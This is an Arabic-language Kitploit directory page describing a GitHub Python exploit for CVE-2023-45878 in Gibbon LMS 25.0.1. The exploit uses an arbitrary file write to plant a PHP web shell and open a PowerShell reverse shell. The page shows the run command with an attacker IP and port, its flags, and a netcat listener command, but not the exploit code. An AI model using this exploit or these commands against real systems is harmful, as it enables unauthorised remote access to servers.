Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-45878 — استغلال بلغة بايثون لثغرة CVE-2023-45878 التي تستهدف Gibbon LMS 25.0.1. يستخدم كتابة ملف تعسفية لرفع شيل ويب PHP وتنفيذ شيل عكسي PowerShell للوصول عن بُعد. | Kitploit
أدوات/GitHubGitHub/dgoorden/cve-2023-45878
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubdgoorden/cve-2023-45878

CVE-2023-45878

استغلال بلغة بايثون لثغرة CVE-2023-45878 التي تستهدف Gibbon LMS 25.0.1. يستخدم كتابة ملف تعسفية لرفع شيل ويب PHP وتنفيذ شيل عكسي PowerShell للوصول عن بُعد.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-45878

تمت كتابة هذا السكريبت بناءً على عمل https://herolab.usd.de/security-advisories/usd-2023-0025/ . يعمل الاستغلال عن طريق استخدام ثغرة كتابة ملف عشوائية في Gibbon LMS 25.0.1 . سيستخدم هذا الإثبات (PoC) تحميل سكريبت php بسيط للأوامر، ثم استخدامه لتحميل غلاف عكسي powershell.

root@kitploit:~
python3 CVE-2023-45878.py -u http://target.com/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf
root@kitploit:~
Flags:
-u, URL where Gibbon LMS is installed.
-l, your IP
-p, your open port
-f, filename. Important if you need to manually test. Default is "asdf".

تأكد من وجود مستمع (listener) جاهز للغلاف الوارد.

root@kitploit:~
nc -lvnp 8888
تنزيل الأداة